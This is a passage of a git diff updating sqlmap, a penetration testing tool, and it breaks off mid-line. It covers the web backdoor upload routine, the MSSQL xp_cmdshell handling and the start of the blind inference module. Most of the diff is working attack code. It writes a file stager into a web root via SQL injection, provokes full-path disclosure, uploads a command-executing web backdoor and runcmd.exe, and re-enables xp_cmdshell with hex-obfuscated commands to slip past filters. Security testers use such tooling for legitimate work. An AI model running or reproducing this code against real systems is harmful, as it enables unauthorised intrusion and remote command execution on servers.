silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT) if page is not None: - output = re.search("<pre>(.+?)</pre>", page, re.I | re.S) + output = re.search(r"<pre>(.+?)</pre>", page, re.I | re.S) if output: output = output.group(1) @@ -86,10 +99,18 @@ def webUpload(self, destFileName, directory, stream=None, content=None, filepath if filepath.endswith('_'): content = decloak(filepath) # cloaked file else: - with open(filepath, "rb") as f: + with openFile(filepath, "rb", encoding=None) as f: content = f.read() + if content is not None: - stream = StringIO.StringIO(content) # string content + stream = io.BytesIO(getBytes(content)) # string content + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/3560 + # Reference: https://stackoverflow.com/a/4677542 + stream.seek(0, os.SEEK_END) + stream.len = stream.tell() + stream.seek(0, os.SEEK_SET) + return self._webFileStreamUpload(stream, destFileName, directory) def _webFileStreamUpload(self, stream, destFileName, directory): @@ -100,42 +121,44 @@ def _webFileStreamUpload(self, stream, destFileName, directory): except TypeError: pass - if self.webApi in getPublicTypeMembers(WEB_API, True): + if self.webPlatform in getPublicTypeMembers(WEB_PLATFORM, True): multipartParams = { - "upload": "1", - "file": stream, - "uploadDir": directory, - } + "upload": "1", + "file": stream, + "uploadDir": directory, + } - if self.webApi == WEB_API.ASPX: + if self.webPlatform == WEB_PLATFORM.ASPX: multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE - page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) + page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) - if "File uploaded" not in page: - warnMsg = "unable to upload the backdoor through " - warnMsg += "the file stager on '%s'" % directory - logger.warn(warnMsg) + if "File uploaded" not in (page or ""): + warnMsg = "unable to upload the file through the web file " + warnMsg += "stager to '%s'" % directory + logger.warning(warnMsg) return False else: return True + else: + logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webPlatform) + return False def _webFileInject(self, fileContent, fileName, directory): - outFile = posixpath.normpath("%s/%s" % (directory, fileName)) - uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) + outFile = posixpath.join(ntToPosixSlashes(directory), fileName) + uplQuery = getUnicode(fileContent).replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) query = "" - if isTechniqueAvailable(kb.technique): - where = kb.injection.data[kb.technique].where + if isTechniqueAvailable(getTechnique()): + where = getTechniqueData().where if where == PAYLOAD.WHERE.NEGATIVE: randInt = randomInt() query += "OR %d=%d " % (randInt, randInt) - query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery)) - query = agent.prefixQuery(query) - query = agent.suffixQuery(query) + query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=encodeHex(uplQuery, binary=False)) + query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) payload = agent.payload(newValue=query) page = Request.queryPage(payload) @@ -147,16 +170,13 @@ def webInit(self): remote directory within the web server document root. """ - if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None: + if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webPlatform is not None: return self.checkDbmsOs() - infoMsg = "trying to upload the file stager" - logger.info(infoMsg) - default = None - choices = list(getPublicTypeMembers(WEB_API, True)) + choices = list(getPublicTypeMembers(WEB_PLATFORM, True)) for ext in choices: if conf.url.endswith(ext): @@ -164,7 +184,7 @@ def webInit(self): break if not default: - default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP + default = WEB_PLATFORM.ASP if Backend.isOs(OS.WINDOWS) else WEB_PLATFORM.PHP message = "which web application language does the web server " message += "support?\n" @@ -181,174 +201,233 @@ def webInit(self): while True: choice = readInput(message, default=str(default)) - if not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") + if not isDigit(choice): + logger.warning("invalid value, only digits are allowed") elif int(choice) < 1 or int(choice) > len(choices): - logger.warn("invalid value, it must be between 1 and %d" % len(choices)) + logger.warning("invalid value, it must be between 1 and %d" % len(choices)) else: - self.webApi = choices[int(choice) - 1] + self.webPlatform = choices[int(choice) - 1] break - kb.docRoot = arrayizeValue(getDocRoot()) - directories = sorted(getDirs()) + if not kb.absFilePaths: + message = "do you want sqlmap to further try to " + message += "provoke the full path disclosure? [Y/n] " + + if readInput(message, default='Y', boolean=True): + headers = {} + been = set([conf.url]) + + for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I): + url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php") + if url not in been: + try: + page, _, _ = Request.getPage(url=url, raise404=False, silent=True) + parseFilePaths(page) + except: + pass + finally: + been.add(url) + + url = re.sub(r"(\.\w+)\Z", r"~\g<1>", conf.url) + if url not in been: + try: + page, _, _ = Request.getPage(url=url, raise404=False, silent=True) + parseFilePaths(page) + except: + pass + finally: + been.add(url) + + for place in (PLACE.GET, PLACE.POST): + if place in conf.parameters: + value = re.sub(r"(\A|&)(\w+)=", r"\g<2>[]=", conf.parameters[place]) + if "[]" in value: + page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + cookie = None + if PLACE.COOKIE in conf.parameters: + cookie = conf.parameters[PLACE.COOKIE] + elif headers and HTTP_HEADER.SET_COOKIE in headers: + cookie = headers[HTTP_HEADER.SET_COOKIE] + + if cookie: + value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie) + if value != cookie: + page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=", cookie) + if value != cookie: + page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + directories = list(arrayizeValue(getManualDirectories())) + directories.extend(getAutoDirectories()) + directories = list(OrderedSet(directories)) + + path = _urllib.parse.urlparse(conf.url).path or '/' + path = re.sub(r"/[^/]*\.\w+\Z", '/', path) + if path != '/': + _ = [] + for directory in directories: + _.append(directory) + if not directory.endswith(path): + _.append("%s/%s" % (directory.rstrip('/'), path.strip('/'))) + directories = _ - backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) - backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi)) + backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webPlatform) + backdoorContent = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.%s_" % self.webPlatform))) - stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) - stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) + stagerContent = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform))) - success = False + for directory in directories: + if not directory: + continue - for docRoot in kb.docRoot: - if success: - break + stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform) + self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) - for directory in directories: - uriPath = "" + uploaded = False + directory = ntToPosixSlashes(normalizePath(directory)) - if not all(isinstance(_, basestring) for _ in (docRoot, directory)): - continue + if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'): + directory = "/%s" % directory - directory = ntToPosixSlashes(normalizePath(directory)).replace("//", "/").rstrip('/') - docRoot = ntToPosixSlashes(normalizePath(docRoot)).replace("//", "/").rstrip('/') - - # '' or '/' -> 'docRoot' - if not directory: - localPath = docRoot - uriPath = '/' - # 'dir1/dir2/dir3' -> 'docRoot/dir1/dir2/dir3' - elif not isWindowsDriveLetterPath(directory) and directory[0] != '/': - localPath = "%s/%s" % (docRoot, directory) - uriPath = "/%s" % directory - else: - localPath = directory - uriPath = directory[2:] if isWindowsDriveLetterPath(directory) else directory - docRoot = docRoot[2:] if isWindowsDriveLetterPath(docRoot) else docRoot + if not directory.endswith('/'): + directory += '/' - if docRoot in uriPath: - uriPath = uriPath.replace(docRoot, "/") - uriPath = "/%s" % normalizePath(uriPath) - else: - webDir = extractRegexResult(r"//[^/]+?/(?P<result>.*)/.", conf.url) + # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method + infoMsg = "trying to upload the file stager on '%s' " % directory + infoMsg += "via LIMIT 'LINES TERMINATED BY' method" + logger.info(infoMsg) + self._webFileInject(stagerContent, stagerName, directory) - if webDir: - uriPath = "/%s" % webDir - else: - continue + for match in re.finditer('/', directory): + self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) + self.webStagerUrl = _urllib.parse.urljoin(self.webBaseUrl, stagerName) + debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl + logger.debug(debugMsg) - localPath = posixpath.normpath(localPath).rstrip('/') - uriPath = posixpath.normpath(uriPath).rstrip('/') + uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) + uplPage = uplPage or "" - # Upload the file stager with the LIMIT 0, 1 INTO OUTFILE technique - self._webFileInject(stagerContent, stagerName, localPath) + if "sqlmap file uploader" in uplPage: + uploaded = True + break - self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath) - self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName) - self.webStagerFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, stagerName))).replace("//", "/").rstrip('/') + # Fall-back to UNION queries file upload method + if not uploaded: + warnMsg = "unable to upload the file stager " + warnMsg += "on '%s'" % directory + singleTimeWarnMessage(warnMsg) - uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) - uplPage = uplPage or "" + if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): + infoMsg = "trying to upload the file stager on '%s' " % directory + infoMsg += "via UNION method" + logger.info(infoMsg) + + stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform) + self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) - # Fall-back to UNION queries file upload technique - if "sqlmap file uploader" not in uplPage: - warnMsg = "unable to upload the file stager " - warnMsg += "on '%s'" % localPath - singleTimeWarnMessage(warnMsg) + handle, filename = tempfile.mkstemp() + os.close(handle) - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - infoMsg = "trying to upload the file stager via " - infoMsg += "UNION technique" - logger.info(infoMsg) + with openFile(filename, "w+") as f: + _ = getText(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform))) + _ = _.replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) + f.write(_) - handle, filename = mkstemp() - os.fdopen(handle).close() # close low level handle (causing problems later) + self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True) - with open(filename, "w+") as f: - _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) - _ = _.replace("WRITABLE_DIR", localPath.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else localPath) - f.write(utf8encode(_)) + for match in re.finditer('/', directory): + self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) + self.webStagerUrl = _urllib.parse.urljoin(self.webBaseUrl, stagerName) - self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True) + debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl + logger.debug(debugMsg) uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) uplPage = uplPage or "" - if "sqlmap file uploader" not in uplPage: - continue - else: - continue + if "sqlmap file uploader" in uplPage: + uploaded = True + break - if "<%" in uplPage or "<?" in uplPage: - warnMsg = "file stager uploaded on '%s', " % localPath - warnMsg += "but not dynamically interpreted" - logger.warn(warnMsg) - continue + if not uploaded: + continue - elif self.webApi == WEB_API.ASPX: - kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage) - kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage) + if "<%" in uplPage or "<?" in uplPage: + warnMsg = "file stager uploaded on '%s', " % directory + warnMsg += "but not dynamically interpreted" + logger.warning(warnMsg) + continue - infoMsg = "the file stager has been successfully uploaded " - infoMsg += "on '%s' - %s" % (localPath, self.webStagerUrl) - logger.info(infoMsg) + elif self.webPlatform == WEB_PLATFORM.ASPX: + kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage) + kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage) - if self.webApi == WEB_API.ASP: - match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage) + infoMsg = "the file stager has been successfully uploaded " + infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl) + logger.info(infoMsg) - if match: - backdoorDirectory = match.group(1) - else: - continue + if self.webPlatform == WEB_PLATFORM.ASP: + match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage) + + if match: + backdoorDirectory = match.group(1) + else: + continue + + _ = "tmpe%s.exe" % randomStr(lowercase=True) + if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace(SHELL_WRITABLE_DIR_TAG, backdoorDirectory).replace(SHELL_RUNCMD_EXE_TAG, _)): + self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_")) + self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) + self.webDirectory = backdoorDirectory + else: + continue - _ = "tmpe%s.exe" % randomStr(lowercase=True) - if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)): - self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_')) - self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) - self.webDirectory = backdoorDirectory + else: + if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent): + warnMsg = "backdoor has not been successfully uploaded " + warnMsg += "through the file stager possibly because " + warnMsg += "the user running the web server process " + warnMsg += "has not write privileges over the folder " + warnMsg += "where the user running the DBMS process " + warnMsg += "was able to upload the file stager or " + warnMsg += "because the DBMS and web server sit on " + warnMsg += "different servers" + logger.warning(warnMsg) + + message = "do you want to try the same method used " + message += "for the file stager? [Y/n] " + + if readInput(message, default='Y', boolean=True): + self._webFileInject(backdoorContent, backdoorName, directory) else: continue - else: - if not self.webUpload(backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath, content=backdoorContent): - warnMsg = "backdoor has not been successfully uploaded " - warnMsg += "through the file stager possibly because " - warnMsg += "the user running the web server process " - warnMsg += "has not write privileges over the folder " - warnMsg += "where the user running the DBMS process " - warnMsg += "was able to upload the file stager or " - warnMsg += "because the DBMS and web server sit on " - warnMsg += "different servers" - logger.warn(warnMsg) - - message = "do you want to try the same method used " - message += "for the file stager? [Y/n] " - getOutput = readInput(message, default="Y") - - if getOutput in ("y", "Y"): - self._webFileInject(backdoorContent, backdoorName, localPath) - else: - continue - - self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) - self.webDirectory = localPath - - self.webBackdoorFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, backdoorName))).replace("//", "/").rstrip('/') - - testStr = "command execution test" - output = self.webBackdoorRunCmd("echo %s" % testStr) - - if output and testStr in output: - infoMsg = "the backdoor has been successfully " - else: - infoMsg = "the backdoor has probably been successfully " + self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName) + self.webDirectory = directory - infoMsg += "uploaded on '%s' - " % self.webDirectory - infoMsg += self.webBackdoorUrl - logger.info(infoMsg) + self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName) - success = True + testStr = "command execution test" + output = self.webBackdoorRunCmd("echo %s" % testStr) - break + if output == "0": + warnMsg = "the backdoor has been uploaded but required privileges " + warnMsg += "for running the system commands are missing" + raise SqlmapNoneDataException(warnMsg) + elif output and testStr in output: + infoMsg = "the backdoor has been successfully " + else: + infoMsg = "the backdoor has probably been successfully " + + infoMsg += "uploaded on '%s' - " % self.webDirectory + infoMsg += self.webBackdoorUrl + logger.info(infoMsg) + + break diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index ffd6a6ce8f7..abefda27ba1 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -1,12 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.agent import agent from lib.core.common import Backend +from lib.core.common import flattenValue from lib.core.common import getLimitRange from lib.core.common import getSQLSnippet from lib.core.common import hashDBWrite @@ -14,15 +15,17 @@ from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable -from lib.core.common import pushValue from lib.core.common import popValue +from lib.core.common import pushValue from lib.core.common import randomStr from lib.core.common import readInput -from lib.core.common import wasLastRequestDelayed -from lib.core.convert import hexencode +from lib.core.common import wasLastResponseDelayed +from lib.core.compat import xrange +from lib.core.convert import encodeHex from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED @@ -32,7 +35,7 @@ from lib.core.threads import getCurrentThreadData from lib.request import inject -class Xp_cmdshell: +class XP_cmdshell(object): """ This class defines methods to deal with Microsoft SQL Server xp_cmdshell extended procedure for plugins. @@ -44,19 +47,18 @@ def __init__(self): def _xpCmdshellCreate(self): cmd = "" - if Backend.isVersionWithin(("2005", "2008")): + if not Backend.isVersionWithin(("2000",)): logger.debug("activating sp_OACreate") cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") inject.goStacked(agent.runAsDBMSUser(cmd)) self._randStr = randomStr(lowercase=True) - self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True) - self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew + self.xpCmdshellStr = "master..new_xp_cmdshell" - cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew) + cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr) - if Backend.isVersionWithin(("2005", "2008")): + if not Backend.isVersionWithin(("2000",)): cmd += ";RECONFIGURE WITH OVERRIDE" inject.goStacked(agent.runAsDBMSUser(cmd)) @@ -83,10 +85,10 @@ def _xpCmdshellConfigure2000(self, mode): return cmd def _xpCmdshellConfigure(self, mode): - if Backend.isVersionWithin(("2005", "2008")): - cmd = self._xpCmdshellConfigure2005(mode) - else: + if Backend.isVersionWithin(("2000",)): cmd = self._xpCmdshellConfigure2000(mode) + else: + cmd = self._xpCmdshellConfigure2005(mode) inject.goStacked(agent.runAsDBMSUser(cmd)) @@ -94,8 +96,9 @@ def _xpCmdshellCheck(self): cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2) self.xpCmdshellExecCmd(cmd) - return wasLastRequestDelayed() + return wasLastResponseDelayed() + @stackedmethod def _xpCmdshellTest(self): threadData = getCurrentThreadData() pushValue(threadData.disableStdOut) @@ -106,14 +109,16 @@ def _xpCmdshellTest(self): if output == "1": logger.info("xp_cmdshell extended procedure is usable") - elif isNoneValue(output): + elif isNoneValue(output) and conf.dbmsCred: errMsg = "it seems that the temporary directory ('%s') used for " % self.getRemoteTempPath() errMsg += "storing console output within the back-end file system " errMsg += "does not have writing permissions for the DBMS process. " errMsg += "You are advised to manually adjust it with option " - errMsg += "--tmp-path switch or you will not be able to retrieve " - errMsg += "the commands output" + errMsg += "'--tmp-path' or you won't be able to retrieve " + errMsg += "the command(s) output" logger.error(errMsg) + elif isNoneValue(output): + logger.error("unable to retrieve xp_cmdshell output") else: logger.info("xp_cmdshell extended procedure is usable") @@ -132,7 +137,7 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile): for line in lines: echoedLine = "echo %s " % line - echoedLine += ">> \"%s\%s\"" % (tmpPath, randDestFile) + echoedLine += ">> \"%s\\%s\"" % (tmpPath, randDestFile) echoedLines.append(echoedLine) for echoedLine in echoedLines: @@ -140,13 +145,13 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile): charCounter += len(echoedLine) if charCounter >= maxLen: - self.xpCmdshellExecCmd(cmd) + self.xpCmdshellExecCmd(cmd.rstrip(" & ")) cmd = "" charCounter = 0 if cmd: - self.xpCmdshellExecCmd(cmd) + self.xpCmdshellExecCmd(cmd.rstrip(" & ")) def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): # When user provides DBMS credentials (with --dbms-cred) we need to @@ -161,9 +166,12 @@ def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): # Obfuscate the command to execute, also useful to bypass filters # on single-quotes self._randStr = randomStr(lowercase=True) - self._cmd = "0x%s" % hexencode(cmd) self._forgedCmd = "DECLARE @%s VARCHAR(8000);" % self._randStr - self._forgedCmd += "SET @%s=%s;" % (self._randStr, self._cmd) + + try: + self._forgedCmd += "SET @%s=%s;" % (self._randStr, "0x%s" % encodeHex(cmd, binary=False)) + except UnicodeError: + self._forgedCmd += "SET @%s='%s';" % (self._randStr, cmd) # Insert the command standard output into a support table, # 'sqlmapoutput', except when DBMS credentials are provided because @@ -171,17 +179,18 @@ def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None): # retrieve the output when OPENROWSET is used hence the redirection # to a temporary file from above if insertIntoTable and not conf.dbmsCred: - self._forgedCmd += "INSERT INTO %s " % insertIntoTable + self._forgedCmd += "INSERT INTO %s(data) " % insertIntoTable self._forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self._randStr) return agent.runAsDBMSUser(self._forgedCmd) def xpCmdshellExecCmd(self, cmd, silent=False): - cmd = self.xpCmdshellForgeCmd(cmd) - return inject.goStacked(cmd, silent) + return inject.goStacked(self.xpCmdshellForgeCmd(cmd), silent) def xpCmdshellEvalCmd(self, cmd, first=None, last=None): + output = None + if conf.direct: output = self.xpCmdshellExecCmd(cmd) @@ -206,13 +215,14 @@ def xpCmdshellEvalCmd(self, cmd, first=None, last=None): inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10))) self.delRemoteFile(self.tmpFile) - query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName) + query = "SELECT %s FROM %s ORDER BY id" % (self.tblField, self.cmdTblName) if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: output = inject.getValue(query, resumeValue=False, blind=False, time=False) - else: + + if (output is None) or len(output) == 0 or output[0] is None: output = [] - count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if isNumPosStrValue(count): for index in getLimitRange(count): @@ -222,12 +232,16 @@ def xpCmdshellEvalCmd(self, cmd, first=None, last=None): inject.goStacked("DELETE FROM %s" % self.cmdTblName) if output and isListLike(output) and len(output) > 1: - if not (output[0] or "").strip(): - output = output[1:] - elif not (output[-1] or "").strip(): - output = output[:-1] + _ = "" + lines = [line for line in flattenValue(output) if line is not None] + + for i in xrange(len(lines)): + line = lines[i] or "" + if line is None or i in (0, len(lines) - 1) and not line.strip(): + continue + _ += "%s\n" % line - output = "\n".join(line for line in filter(None, output)) + output = _.rstrip('\n') return output @@ -247,9 +261,8 @@ def xpCmdshellInit(self): message = "xp_cmdshell extended procedure does not seem to " message += "be available. Do you want sqlmap to try to " message += "re-enable it? [Y/n] " - choice = readInput(message, default="Y") - if not choice or choice in ("y", "Y"): + if readInput(message, default='Y', boolean=True): self._xpCmdshellConfigure(1) if self._xpCmdshellCheck(): @@ -257,7 +270,7 @@ def xpCmdshellInit(self): kb.xpCmdshellAvailable = True else: - logger.warn("xp_cmdshell re-enabling failed") + logger.warning("xp_cmdshell re-enabling failed") logger.info("creating xp_cmdshell with sp_OACreate") self._xpCmdshellConfigure(0) @@ -270,7 +283,7 @@ def xpCmdshellInit(self): else: warnMsg = "xp_cmdshell creation failed, probably " warnMsg += "because sp_OACreate is disabled" - logger.warn(warnMsg) + logger.warning(warnMsg) hashDBWrite(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE, kb.xpCmdshellAvailable) diff --git a/lib/techniques/__init__.py b/lib/techniques/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/techniques/__init__.py +++ b/lib/techniques/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/techniques/blind/__init__.py b/lib/techniques/blind/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/techniques/blind/__init__.py +++ b/lib/techniques/blind/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 0fd59266281..2c1d3f41634 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -1,28 +1,33 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import threading +from __future__ import division + +import re import time -from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout -from lib.core.common import decodeHexValue +from lib.core.common import decodeDbmsHexValue from lib.core.common import decodeIntToUnicode from lib.core.common import filterControlChars from lib.core.common import getCharset from lib.core.common import getCounter -from lib.core.common import goGoodSamaritan from lib.core.common import getPartRun +from lib.core.common import getTechnique +from lib.core.common import getTechniqueData +from lib.core.common import goGoodSamaritan from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import incrementCounter +from lib.core.common import isDigit +from lib.core.common import isListLike from lib.core.common import safeStringFormat from lib.core.common import singleTimeWarnMessage from lib.core.data import conf @@ -34,22 +39,30 @@ from lib.core.enums import DBMS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapThreadException -from lib.core.progress import ProgressBar +from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.settings import CHAR_INFERENCE_MARK from lib.core.settings import INFERENCE_BLANK_BREAK -from lib.core.settings import INFERENCE_UNKNOWN_CHAR -from lib.core.settings import INFERENCE_GREATER_CHAR from lib.core.settings import INFERENCE_EQUALS_CHAR +from lib.core.settings import INFERENCE_GREATER_CHAR +from lib.core.settings import INFERENCE_MARKER from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR -from lib.core.settings import MAX_TIME_REVALIDATION_STEPS +from lib.core.settings import INFERENCE_UNKNOWN_CHAR +from lib.core.settings import MAX_BISECTION_LENGTH +from lib.core.settings import MAX_REVALIDATION_STEPS +from lib.core.settings import NULL from lib.core.settings import PARTIAL_HEX_VALUE_MARKER from lib.core.settings import PARTIAL_VALUE_MARKER +from lib.core.settings import PAYLOAD_DELIMITER +from lib.core.settings import RANDOM_INTEGER_MARKER from lib.core.settings import VALID_TIME_CHARS_RUN_THRESHOLD from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request +from lib.utils.progress import ProgressBar +from lib.utils.safe2bin import safecharencode from lib.utils.xrange import xrange +from thirdparty import six def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False): """ @@ -58,15 +71,27 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None """ abortedFlag = False + showEta = False partialValue = u"" finalValue = None retrievedLength = 0 - asciiTbl = getCharset(charsetType) - timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) + + if payload is None: + return 0, None + + if charsetType is None and conf.charset: + asciiTbl = sorted(set(ord(_) for _ in 